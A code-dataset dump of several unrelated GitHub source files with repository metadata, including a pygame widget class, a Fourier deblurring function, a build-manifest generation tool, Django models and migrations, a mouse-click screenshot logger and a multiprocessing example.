if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
self.is_hover = True
else:
self.is_hover = False
def update(self, mx, my, mouse_buttons, events):
self.set_hover_state(mx, my)
def get_rect(self):
return pygame.Rect(self.x, self.y, self.width, self.height)
def is_hover_active(self):
return self.is_hover
def draw(self, renderer):
raise NotImplementedError
def register_gui_handler(self, gui_handler):
self.gui_handler = gui_handler
def enable_focus(self):
self.focus = True
def disable_focus(self):
self.focus = False
def has_focus(self):
return self.focus
def set_visible(self, value):
self.visible = value
def is_visible(self):
return self.visible
|
[
"robert.kessler@klarna.com"
] |
robert.kessler@klarna.com
|
0f30f9125763d9b2ac1d7dec0a5bd1a1859b038b
|
01341e6b4e13679f3a78bd02f7156cb52d11d8d8
|
/utils_fourier.py
|
6f311983041114e5ad36b3ca37ad29ee24dfbbf4
|
[
"MIT"
] |
permissive
|
majedelhelou/PriorLearning
|
864b1499ac993b730b90e3b700b3d59795865818
|
f66d25993c3b99dd31d9d62abeb3e0a5623e034d
|
refs/heads/master
| 2020-09-13T09:22:45.011770
| 2020-01-11T23:50:10
| 2020-01-11T23:50:10
| 222,724,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
from utils_deblur import psf2otf, otf2psf
import numpy as np
def deblurring_estimate(Y, X_l, k_l, reg_weight=1):
'''
Operation: solve for Z that minimizes: ||Y-k_l*Z||**2 + reg_weight * ||Z-X_l||**2
Inputs:
2D images Y and X_l (Gray or multichannel)
k_l (blur kernel for the low-res image, should be normalized to 1)
reg_weight (weight of the reg term ||Z-X_l||**2)
Outputs:
Z image that minimizes the optimization loss
'''
# Convert inputs to Fourier domain
X_l_Freq = np.fft.fft2(X_l, axes=[0, 1])
Y_Freq = np.fft.fft2(Y, axes=[0, 1])
k_l_Freq = psf2otf(k_l, Y.shape[:2])
if X_l_Freq.ndim == 3:
k_l_Freq = np.repeat(k_l_Freq[:, :, np.newaxis], X_l_Freq.shape[2], axis=2)
# Solve for k in Fourier domain (regularization only affects den)
num = k_l_Freq.conjugate() * Y_Freq + reg_weight * X_l_Freq
den = np.abs(k_l_Freq)**2 + reg_weight # Fourier transform of k_l transpose * k_l + reg_weight
Z_Freq = num / den
# Convert back to the spatial domain, keeping only the real part
Z = np.real(np.fft.ifft2(Z_Freq, axes=(0, 1)))
return Z
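if __name__ == '__main__':
    # Minimal usage sketch (hedged: shapes and values are invented purely
    # for illustration).
    Y_demo = np.random.rand(64, 64)    # blurred observation
    X_demo = np.random.rand(64, 64)    # prior / low-res estimate
    k_demo = np.ones((5, 5)) / 25.0    # normalized box-blur kernel
    Z_demo = deblurring_estimate(Y_demo, X_demo, k_demo, reg_weight=0.5)
    print(Z_demo.shape)  # (64, 64)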
|
[
"elhelou@iccluster047.iccluster.epfl.ch"
] |
elhelou@iccluster047.iccluster.epfl.ch
|
898c24a3febc9ddd599cab942912e2123013e61b
|
b857011826feae5dc8b68083b30e589e8179789f
|
/build-from-manifest/build_from_manifest.py
|
f046c52558dc31dec421ec2d650a7c52d92d19e4
|
[] |
no_license
|
minddrive/build-tools
|
934d862851989d80eb2eb0746e160ac571e09261
|
83a7af0bc6679c3d461d3b4f3edfad5e47ec9f74
|
refs/heads/master
| 2020-03-27T02:17:28.657669
| 2018-08-31T03:03:00
| 2018-08-31T03:03:00
| 145,779,487
| 0
| 0
| null | 2018-08-23T00:47:16
| 2018-08-23T00:47:16
| null |
UTF-8
|
Python
| false
| false
| 22,754
|
py
|
#!/usr/bin/env python3.6
"""
Program to generate build information along with a source tarball
for building when any additional changes have happened for a given
input build manifest
"""
import argparse
import contextlib
import gzip
import json
import os
import os.path
import pathlib
import shutil
import sys
import tarfile
import time
import xml.etree.ElementTree as EleTree
from datetime import datetime
from pathlib import Path
from subprocess import PIPE, run
from typing import Union
# Context manager for handling a given set of code/commands
# being run from a given directory on the filesystem
@contextlib.contextmanager
def pushd(new_dir):
old_dir = os.getcwd()
os.chdir(new_dir)
try:
yield
finally:
os.chdir(old_dir)
# Save current path for program
script_dir = os.path.dirname(os.path.realpath(__file__))
class ManifestBuilder:
"""
Handle creating a new manifest from a given input manifest,
along with other files needed for a new build
"""
# Files to be generated
output_filenames = [
'build.properties',
'build-properties.json',
'build-manifest.xml',
'source.tar',
'source.tar.gz',
'CHANGELOG'
]
def __init__(self, args):
"""
Initialize from the arguments and set up a set of additional
attributes for handling key data
"""
self.manifest = pathlib.Path(args.manifest)
self.manifest_project = args.manifest_project
self.build_manifests_org = args.build_manifests_org
self.force = args.force
self.push = not args.no_push
self.output_files = dict()
self.product = None
self.manifest_path = None
self.input_manifest = None
self.manifests = None
self.product_config = None
self.manifest_config = None
self.product_branch = None
self.start_build = None
self.type = None
self.parent = None
self.parent_branch = None
self.build_job = None
self.build_manifest_filename = None
self.branch_exists = 0
self.version = None
self.release = None
self.last_build_num = 0
self.build_num = None
def prepare_files(self):
"""
For the set of files to be generated, ensure any current
versions of them in the filesystem are removed, and keep
track of them via a dictionary
"""
for name in self.output_filenames:
output_file = pathlib.Path(name)
if output_file.exists():
output_file.unlink()
self.output_files[name] = output_file
def determine_product_info(self):
"""
Determine the product and manifest path from the given
input manifest
"""
path_parts = self.manifest.parts
base, rest = path_parts[0], self.manifest.relative_to(path_parts[0])
if len(path_parts) == 1:
# For legacy reasons, 'top-level' manifests
# are couchbase-server
self.product = 'couchbase-server'
self.manifest_path = base
elif base == 'cbdeps':
# Handle cbdeps projects specially
path_parts = rest.parts
self.product = f'cbdeps/{path_parts[0]}'
self.manifest_path = rest.relative_to(path_parts[0])
else:
self.product = base
self.manifest_path = rest
@staticmethod
def update_manifest_repo():
"""
Update the manifest repository
"""
print('Updating manifest repository...')
run(['git', 'fetch', '--all'], check=True)
run(['git', 'checkout', '-B', 'master', 'origin/master'], check=True)
def parse_manifest(self):
"""
Parse the input manifest (via xml.ElementTree)
"""
if not self.manifest.exists():
print(f'Manifest "{self.manifest}" does not exist!')
sys.exit(3)
self.input_manifest = EleTree.parse(self.manifest)
def get_product_and_manifest_config(self):
"""
Determine product config information related to input manifest,
along with the specific manifest information as well
"""
config_name = pathlib.Path(self.product) / 'product-config.json'
try:
with open(config_name) as fh:
self.product_config = json.load(fh)
except FileNotFoundError:
self.product_config = dict()
# Override product if set in product-config.json
self.product = self.product_config.get('product', self.product)
self.manifests = self.product_config.get('manifests', dict())
self.manifest_config = self.manifests.get(str(self.manifest), dict())
def do_manifest_stuff(self):
"""
Handle the various manifest tasks:
- Clone the manifest repository if it's not already there
- Update the manifest repository to latest revision
- Parse the manifest and gather product and manifest config
information
"""
manifest_dir = pathlib.Path('manifest')
if not manifest_dir.exists():
run(['git', 'clone', self.manifest_project, 'manifest'],
check=True)
with pushd(manifest_dir):
self.update_manifest_repo()
self.parse_manifest()
self.get_product_and_manifest_config()
def update_submodules(self, module_projects):
"""
Update all existing submodules for given repo sync
"""
module_projects_dir = pathlib.Path('module_projects')
if not module_projects_dir.exists():
module_projects_dir.mkdir()
with pushd(module_projects_dir):
print('"module_projects" is set, updating manifest...')
# The following really should be importable as a module
run(
[f'{script_dir}/update_manifest_from_modules']
+ module_projects, check=True
)
with pushd(module_projects_dir.parent / 'manifest'):
# I have no idea why this call is required, but
# 'git diff-index' behaves erratically without it
print(run(['git', 'status'], check=True, stdout=PIPE).stdout)
rc = run(['git', 'diff-index', '--quiet', 'HEAD']).returncode
if rc:
if self.push:
print(f'Pushing updated input manifest upstream... '
f'return code was {rc}')
run([
'git', 'commit', '-am', f'Automated update of '
f'{self.product} from submodules'
], check=True)
run(['git', 'push'], check=True)
else:
print('Skipping push of updated input manifest '
'due to --no-push')
else:
print('Input manifest left unchanged after updating '
'submodules')
def set_relevant_parameters(self):
"""
Determine various key parameters needed to pass on
for building the product
"""
self.product_branch = self.manifest_config.get('branch', 'master')
self.start_build = self.manifest_config.get('start_build', 1)
self.type = self.manifest_config.get('type', 'production')
self.parent = self.manifest_config.get('parent')
self.parent_branch = \
self.manifests.get(self.parent, {}).get('branch', 'master')
# Individual manifests are allowed to have a different
# product setting as well
self.product = self.manifest_config.get('product', self.product)
self.build_job = \
self.manifest_config.get('jenkins_job', f'{self.product}-build')
def set_build_parameters(self):
"""
Determine various build parameters for given input manifest,
namely version and release
"""
build_element = self.input_manifest.find('./project[@name="build"]')
if build_element is None:
print(f'Input manifest {self.manifest} has no "build" project!')
sys.exit(4)
vers_annot = build_element.find('annotation[@name="VERSION"]')
if vers_annot is not None:
self.version = vers_annot.get('value')
print(f'Input manifest version: {self.version}')
else:
self.version = '0.0.0'
print('Defaulting version to 0.0.0')
self.release = self.manifest_config.get('release', self.version)
def perform_repo_sync(self):
"""
Perform a repo sync based on the input manifest
"""
product_dir = pathlib.Path(self.product)
top_dir = pathlib.Path.cwd()
if not product_dir.is_dir():
product_dir.mkdir(parents=True)
with pushd(product_dir):
top_level = [
f for f in pathlib.Path().iterdir() if f != '.repo'
]
child: Union[str, Path]
for child in top_level:
    if child.is_dir():
        shutil.rmtree(child)
    else:
        child.unlink()
run(['repo', 'init', '-u', str(top_dir / 'manifest'), '-g', 'all',
'-m', str(self.manifest)], check=True)
run(['repo', 'sync', '--jobs=6', '--force-sync'], check=True)
def update_bm_repo_and_get_build_num(self):
"""
Update the build-manifests repository checkout, then
determine the next build number to use
"""
bm_dir = pathlib.Path('build-manifests')
if not bm_dir.is_dir():
run(['git', 'clone', f'ssh://git@github.com/'
f'{self.build_manifests_org}/build-manifests'],
check=True)
with pushd(bm_dir):
run(['git', 'reset', '--hard'], check=True)
print('Updating the build-manifests repository...')
run(['git', 'fetch', '--all'], check=True)
self.build_manifest_filename = pathlib.Path(
f'{self.product}/{self.release}/{self.version}.xml'
).resolve()
if self.build_manifest_filename.exists():
last_build_manifest = EleTree.parse(
self.build_manifest_filename
)
last_bld_num_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="BLD_NUM"]'
)
if last_bld_num_annot is not None:
self.last_build_num = int(last_bld_num_annot.get('value'))
self.build_num = max(self.last_build_num + 1, self.start_build)
def generate_changelog(self):
"""
Generate the CHANGELOG file from any changes that have been
found; if none are found and the build is not being forced,
write out the properties files and exit the program
"""
if self.build_manifest_filename.exists():
output = run(['repo', 'diffmanifests', '--raw',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
# Strip out non-project lines as well as testrunner project
lines = [x for x in output.splitlines()
if not (x.startswith(b' ')
or x.startswith(b'C testrunner'))]
if not lines:
if not self.force:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}; not executing '
f'new build')
json_file = self.output_files['build-properties.json']
prop_file = self.output_files['build.properties']
with open(json_file, 'w') as fh:
    json.dump({}, fh)
with open(prop_file, 'w') as fh:
    fh.write('')
sys.exit(0)
else:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}, but forcing new '
f'build anyway')
print('Saving CHANGELOG...')
# Need to re-run 'repo diffmanifests' without '--raw'
# to get pretty output
output = run(['repo', 'diffmanifests',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
with open(self.output_files['CHANGELOG'], 'wb') as fh:
fh.write(output)
def update_build_manifest_annotations(self):
"""
Update the build annotations in the new build manifest
based on the gathered information, also generating a
commit message for later use
"""
build_manifest_dir = self.build_manifest_filename.parent
if not build_manifest_dir.is_dir():
build_manifest_dir.mkdir(parents=True)
def insert_child_annot(parent, name, value):
annot = EleTree.Element('annotation')
annot.set('name', name)
annot.set('value', value)
annot.tail = '\n '
parent.insert(0, annot)
print(f'Updating build manifest {self.build_manifest_filename}')
with open(self.build_manifest_filename, 'w') as fh:
run(['repo', 'manifest', '-r'], check=True, stdout=fh)
last_build_manifest = EleTree.parse(self.build_manifest_filename)
build_element = last_build_manifest.find('./project[@name="build"]')
insert_child_annot(build_element, 'BLD_NUM', str(self.build_num))
insert_child_annot(build_element, 'PRODUCT', self.product)
insert_child_annot(build_element, 'RELEASE', self.release)
version_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="VERSION"]'
)
if version_annot is None:
insert_child_annot(build_element, 'VERSION', self.version)
last_build_manifest.write(self.build_manifest_filename)
return (f"{self.product} {self.release} build {self.version}-"
f"{self.build_num}\n\n"
f"{datetime.now().strftime('%Y/%m/%d %H:%M:%S')} "
f"{time.tzname[time.localtime().tm_isdst]}")
def push_manifest(self, commit_msg):
"""
Push the new build manifest to the build-manifests
repository, but only if it hasn't been disallowed
"""
with pushd('build-manifests'):
run(['git', 'add', self.build_manifest_filename], check=True)
run(['git', 'commit', '-m', commit_msg], check=True)
if self.push:
run(['git', 'push', 'origin', 'HEAD:refs/heads/master'],
check=True)
else:
print('Skipping push of new build manifest due to --no-push')
def copy_build_manifest(self):
"""
Copy the new build manifest to the product directory
and the root directory
"""
print('Saving build manifest...')
shutil.copy(self.build_manifest_filename,
self.output_files['build-manifest.xml'])
# Also keep a copy of the build manifest in the tarball
shutil.copy(self.build_manifest_filename,
pathlib.Path(self.product) / 'manifest.xml')
def create_properties_files(self):
"""
Generate the two properties files (JSON and INI)
from the gathered information
"""
print('Saving build parameters...')
properties = {
'PRODUCT': self.product,
'RELEASE': self.release,
'PRODUCT_BRANCH': self.product_branch,
'VERSION': self.version,
'BLD_NUM': self.build_num,
'MANIFEST': str(self.manifest),
'PARENT': self.parent,
'TYPE': self.type,
'BUILD_JOB': self.build_job,
'FORCE': self.force
}
with open(self.output_files['build-properties.json'], 'w') as fh:
json.dump(properties, fh, indent=2, separators=(',', ': '))
with open(self.output_files['build.properties'], 'w') as fh:
fh.write(f'PRODUCT={self.product}\nRELEASE={self.release}\n'
f'PRODUCT_BRANCH={self.product_branch}\n'
f'VERSION={self.version}\nBLD_NUM={self.build_num}\n'
f'MANIFEST={self.manifest}\nPARENT={self.parent}\n'
f'TYPE={self.type}\nBUILD_JOB={self.build_job}\n'
f'FORCE={self.force}\n')
def create_tarball(self):
"""
Create the source tarball from the repo sync and generated
files (new manifest and CHANGELOG). Avoid copying the .repo
information, and only copy the .git directory if specified.
"""
tarball_filename = self.output_files['source.tar']
targz_filename = self.output_files['source.tar.gz']
print(f'Creating {tarball_filename}')
product_dir = pathlib.Path(self.product)
with pushd(product_dir):
with tarfile.open(tarball_filename, 'w') as tar_fh:
for root, dirs, files in os.walk('.'):
for name in files:
tar_fh.add(os.path.join(root, name)[2:])
for name in list(dirs):  # iterate over a copy, since dirs is pruned in place
if name == '.repo' or name == '.git':
dirs.remove(name)
else:
tar_fh.add(os.path.join(root, name)[2:],
recursive=False)
if self.manifest_config.get('keep_git', False):
print(f'Adding Git files to {tarball_filename}')
# When keeping git files, need to dereference symlinks
# so that the resulting .git directories work on Windows.
# Because of this, we don't save the .repo directory
# also, as that would double the size of the tarball
# since mostly .repo just contains git dirs.
with tarfile.open(tarball_filename, "a",
dereference=True) as tar:
for root, dirs, files in os.walk('.', followlinks=True):
for name in list(dirs):  # iterate over a copy, since dirs is pruned in place
if name == '.repo':
dirs.remove(name)
elif name == '.git':
tar.add(os.path.join(root, name)[2:],
recursive=False)
if '/.git' in root:
for name in files:
# Git (or repo) sometimes creates broken
# symlinks, like "shallow", and Python's
# tarfile module chokes on those
if os.path.exists(os.path.join(root, name)):
tar.add(os.path.join(root, name)[2:],
recursive=False)
print(f'Compressing {tarball_filename}')
with open(tarball_filename, 'rb') as f_in, \
gzip.open(targz_filename, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
os.unlink(tarball_filename)
def generate_final_files(self):
"""
Generate the new files needed, which are:
- new build manifest
- properties files (JSON and INI-style)
- source tarball (which includes the manifest)
"""
self.copy_build_manifest()
self.create_properties_files()
self.create_tarball()
def create_manifest(self):
"""
The orchestration method to handle the full program flow
from a high-level overview. Summary:
- Prepare for various key files, removing any old ones
- Determine the product information from the config files
- Setup manifest repository and determine build information
from it
- If there are submodules, ensure they're updated
- Set the relevant and necessary parameters (e.g. version)
- Do a repo sync based on the given manifest
- Update the build-manifests repository and determine
the next build number to use
- Generate the CHANGELOG and update the build manifest
annotations
- Push the generated manifest to build-manifests, if
pushing is requested
- Generate the new build manifest, properties files, and
source tarball
"""
self.prepare_files()
self.determine_product_info()
self.do_manifest_stuff()
module_projects = self.manifest_config.get('module_projects')
if module_projects is not None:
self.update_submodules(module_projects)
self.set_relevant_parameters()
self.set_build_parameters()
self.perform_repo_sync()
self.update_bm_repo_and_get_build_num()
with pushd(self.product):
self.generate_changelog()
commit_msg = self.update_build_manifest_annotations()
self.push_manifest(commit_msg)
self.generate_final_files()
def parse_args():
"""Parse and return command line arguments"""
parser = argparse.ArgumentParser(
description='Create new build manifest from input manifest'
)
parser.add_argument('--manifest-project', '-p',
default='git://github.com/minddrive/manifest.git',
help='Alternate Git URL for manifest repository')
parser.add_argument('--build-manifests-org', default='minddrive',
help='Alternate GitHub organization for '
'build-manifests')
parser.add_argument('--force', '-f', action='store_true',
help='Produce new build manifest even if there '
'are no repo changes')
parser.add_argument('--no-push', action='store_true',
help='Do not push final build manifest')
parser.add_argument('manifest', help='Path to input manifest')
return parser.parse_args()
def main():
"""Initialize manifest builder object and trigger the build"""
manifest_builder = ManifestBuilder(parse_args())
manifest_builder.create_manifest()
if __name__ == '__main__':
main()
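# Example invocation (hedged: the manifest path is hypothetical):
#
#   ./build_from_manifest.py --no-push couchbase-server/master.xml
#
# This syncs the repos named in the input manifest, computes the next build
# number from build-manifests, and emits build.properties,
# build-properties.json, build-manifest.xml, CHANGELOG and source.tar.gz.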
|
[
"kenneth.lareau@couchbase.com"
] |
kenneth.lareau@couchbase.com
|
7b677664e2d8c491d59f10a622c3e9d6b0b04b4f
|
65e94640b9838d627c0781cab4317858baadc914
|
/item/migrations/0001_initial.py
|
66445d68eb8afc07d45352a4ba0ad90a0d637ee0
|
[] |
no_license
|
Acc-Zidan/airbnb4
|
ccfc2a3b098f5906ef2c0187ac7ef89e98552af9
|
1e74f3b9a9b9aa7fb2ae1c055128d549067a4abc
|
refs/heads/main
| 2023-03-01T21:01:19.318547
| 2021-02-09T18:34:42
| 2021-02-09T18:34:42
| 328,228,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,710
|
py
|
# Generated by Django 3.1.5 on 2021-01-22 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='Item/')),
('price', models.IntegerField(default=0)),
('description', models.TextField(max_length=10000)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_category', to='item.category')),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='place/')),
],
),
migrations.CreateModel(
name='ItemReview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rate', models.IntegerField(default=0)),
('feedback', models.CharField(max_length=2000)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_auther', to=settings.AUTH_USER_MODEL)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_item', to='item.item')),
],
),
migrations.CreateModel(
name='ItemImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='ItemImages/')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_images', to='item.item')),
],
),
migrations.CreateModel(
name='Itembook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_from', models.DateField(default=django.utils.timezone.now)),
('date_to', models.DateField(default=django.utils.timezone.now)),
('qnty', models.IntegerField(default=1)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_item', to='item.item')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_owner', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='item',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_place', to='item.place'),
),
]
|
[
"ahmedzidan858@gmail.com"
] |
ahmedzidan858@gmail.com
|
10329cd8754e9c98706dbaac2a3fdf61e41158c0
|
000144b20bfd717d223c088847de9479ca23c499
|
/djangorq_project/wsgi.py
|
d1fa13347e41771775c75bc8cc6769d7b61d572b
|
[] |
no_license
|
stuartmaxwell/django-django_rq-advanced-example
|
cfbb8ea83d28354def6fa4787a18718507a422db
|
f9c88b4fa5c4377143fb9986888c11adf95c57ef
|
refs/heads/master
| 2022-12-03T15:00:47.284986
| 2020-08-03T09:38:50
| 2020-08-03T09:38:50
| 260,836,030
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for djangorq_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangorq_project.settings")
application = get_wsgi_application()
|
[
"stuart@tpad.amanzi.local"
] |
stuart@tpad.amanzi.local
|
21fb9340d7f32f6154426ff550bec28acbfdafb6
|
203d90b6f0a0fe38cf6a77d50c6e5aa528e4d50d
|
/blog/models.py
|
4398a5455471cb25c799d12afc32868947063c59
|
[] |
no_license
|
leayl/mysite
|
dcc92bedc27b6206ec566f5b4421ee517a838ddd
|
b7974ce9fffe5c4f61d1c0d4facdd7c7860c0204
|
refs/heads/master
| 2021-06-23T23:53:39.046179
| 2019-09-23T03:51:45
| 2019-09-23T03:51:45
| 181,919,893
| 0
| 0
| null | 2021-06-10T21:23:46
| 2019-04-17T15:31:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,109
|
py
|
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields import exceptions
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from read_statistics.models import ReadNumExtendMethod
class BlogType(models.Model):
title = models.CharField(max_length=32)
def __str__(self):
return self.title
class Blog(models.Model, ReadNumExtendMethod):
    """
    Inherits ReadNumExtendMethod from read_statistics.models,
    which provides the get_read_num method so read counts can be
    shown directly in the admin backend.
    """
title = models.CharField(max_length=32)
blog_type = models.ForeignKey(BlogType, on_delete=models.DO_NOTHING)
content = RichTextUploadingField()
author = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# read_times = models.IntegerField(default=0)
created_time = models.DateTimeField(auto_now_add=True)
last_update_time = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Meta:
ordering = ['-created_time']
|
[
"lea_yl@163.com"
] |
lea_yl@163.com
|
e0cca89f4a4f404016bb78405ab89923c78dd493
|
9efe0d0773bddc264b9598bf1cb16f821dd0ed9c
|
/detect.py
|
f2ec8cc08dde54b5e1bd55dcab9e3f4285d4d5dc
|
[
"MIT"
] |
permissive
|
chaosparrot/icuclick
|
08ecacda1ca663a653ec8d9b3233ad8dc264262a
|
2ca7f3446bcddbd03aa3211a544427c826809444
|
refs/heads/master
| 2020-07-06T04:08:16.090683
| 2019-08-25T09:10:39
| 2019-08-25T09:10:39
| 202,886,525
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,656
|
py
|
# Code to check if left or right mouse buttons were pressed
import win32api
import time
import pyautogui
import numpy
from win32gui import WindowFromPoint, GetWindowRect
pyautogui.PAUSE = 0
pyautogui.FAILSAFE = False
state_left = win32api.GetKeyState(0x01) # Left button down = 0 or 1. Button up = -127 or -128
state_right = win32api.GetKeyState(0x02) # Right button down = 0 or 1. Button up = -127 or -128
large_movement_picture = None
movement_start_time = None
previous_position = pyautogui.position()
window_bounds = GetWindowRect( WindowFromPoint( (0, 0) ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
while True:
a = win32api.GetKeyState(0x01)
b = win32api.GetKeyState(0x02)
position = pyautogui.position()
if a != state_left: # Button state changed
state_left = a
pic = pyautogui.screenshot()
if a < 0:
# Keep the window bounds only when holding down the mouse button, because the windows size can change based on releasing the mouse button
window_bounds = GetWindowRect( WindowFromPoint( position ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousedown.png')
print('Saving mousedown screenshot')
else:
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mouseup.png')
print( "Saving mouseup screenshot" )
if large_movement_picture is not None:
large_movement_picture.save('data/raw/' + str( int( movement_start_time * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousemove.png')
print( "Saving mousemovement screenshot" )
large_movement_picture = None
movement_start_time = None
if b != state_right: # Button state changed
state_right = b
#print(b)
#if b < 0:
#print('Right Button Pressed')
#else:
#print('Right Button Released')
# Large movement detection
xDistance = numpy.linalg.norm(previous_position[0]-position[0])
yDistance = numpy.linalg.norm(previous_position[1]-position[1])
if( xDistance + yDistance > 10 ):
large_movement_picture = pyautogui.screenshot()
movement_start_time = time.time()
print( "Detecting large movement - " + str( xDistance + yDistance ) )
previous_position = position
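# Hedged usage note: this script is Windows-only (win32api/win32gui).
# Screenshots are written to data/raw/ as
# <timestamp>--(x-y)--[window bounds]--<event>.png, so that directory is
# assumed to exist before the script starts.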
|
[
"kevinteraa@gmail.com"
] |
kevinteraa@gmail.com
|
06ebfc7c0dd8d9fa2e442b989356c0541f537915
|
e4eca3e87148f9afc93233b13c54c5e065f704b1
|
/pyMRA/multiprocess/example.py
|
6729aaca6a0ed1bb1006d371176603e55628d452
|
[
"MIT"
] |
permissive
|
katzfuss-group/pyMRA
|
51dddfcba457e5ebf76f6a9bbe69d7efa2208cb4
|
6214f2a89b5abb6dce3f3187692bea88874a4649
|
refs/heads/master
| 2021-04-03T04:12:37.142914
| 2018-03-09T15:40:35
| 2018-03-09T15:40:35
| 124,594,147
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,749
|
py
|
import multiprocessing
import sys
import re
class ProcessWorker(multiprocessing.Process):
"""
This class runs as a separate process to execute worker's commands in parallel
Once launched, it remains running, monitoring the task queue, until "None" is sent
"""
def __init__(self, task_q, result_q):
multiprocessing.Process.__init__(self)
self.task_q = task_q
self.result_q = result_q
return
def run(self):
"""
Overloaded function provided by multiprocessing.Process. Called upon start() signal
"""
proc_name = self.name
print( '%s: Launched' % (proc_name))
while True:
next_task_list = self.task_q.get()
if next_task_list is None:
# Poison pill means shutdown
print('%s: Exiting' % (proc_name))
self.task_q.task_done()
break
next_task = next_task_list[0]
print( '%s: %s' % (proc_name, next_task))
args = next_task_list[1]
kwargs = next_task_list[2]
answer = next_task(*args, **kwargs)
self.task_q.task_done()
self.result_q.put(answer)
return
# End of ProcessWorker class
class Worker(object):
"""
Launches a child process to run commands from derived classes in separate processes,
which sit and listen for something to do
This base class is called by each derived worker
"""
def __init__(self, config, index=None):
self.config = config
self.index = index
# Launch the ProcessWorker for anything that has an index value
if self.index is not None:
self.task_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.Queue()
self.process_worker = ProcessWorker(self.task_q, self.result_q)
self.process_worker.start()
print( "Got here")
# Process should be running and listening for functions to execute
return
def enqueue_process(target): # No self, since it is a decorator
"""
Used to place a command target from this class object into the task_q
NOTE: Any function decorated with this must use fetch_results() to get the
target task's result value
"""
def wrapper(self, *args, **kwargs):
self.task_q.put([target, args, kwargs]) # FAIL: target is a class instance method and can't be pickled!
return wrapper
def fetch_results(self):
"""
After all processes have been spawned by multiple modules, this command
is called on each one to retrieve the results of the call.
This blocks until the execution of the item in the queue is complete
"""
self.task_q.join()  # Wait for it to finish
return self.result_q.get() # Return the result
@enqueue_process
def run_long_command(self, command):
print( "I am running number % as process "%number, self.name )
# In here, I will launch a subprocess to run a long-running system command
# p = Popen(command), etc
# p.wait(), etc
return
def close(self):
self.task_q.put(None)
self.task_q.join()
if __name__ == '__main__':
config = ["some value", "something else"]
index = 7
workers = []
for i in range(5):
worker = Worker(config, index)
worker.run_long_command("ls /")
workers.append(worker)
for worker in workers:
worker.fetch_results()
# Do more work... (this would actually be done in a distributor in another class)
for worker in workers:
worker.close()
|
[
"marcinjurek1988@gmail.com"
] |
marcinjurek1988@gmail.com
|
f6a223d328e72ba600c445072360b528c214a1e7
|
35ef5e728116fc66d0b75656be2f26786348b14a
|
/accounts/migrations/0006_contact_create_date.py
|
06dcda1b829ebc66c72d66a79ac32633ba63d638
|
[] |
no_license
|
ahmedyasin21/believer
|
e16d1c2c36cca12291d57d923cc39b5458ec1a5a
|
4ce02c0f7f090ea02222c6a7396be2a9fd741295
|
refs/heads/main
| 2023-08-20T04:43:39.976198
| 2021-11-01T07:50:39
| 2021-11-01T07:50:39
| 423,379,714
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 3.0.3 on 2020-10-01 10:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20201001_0148'),
]
operations = [
migrations.AddField(
model_name='contact',
name='create_date',
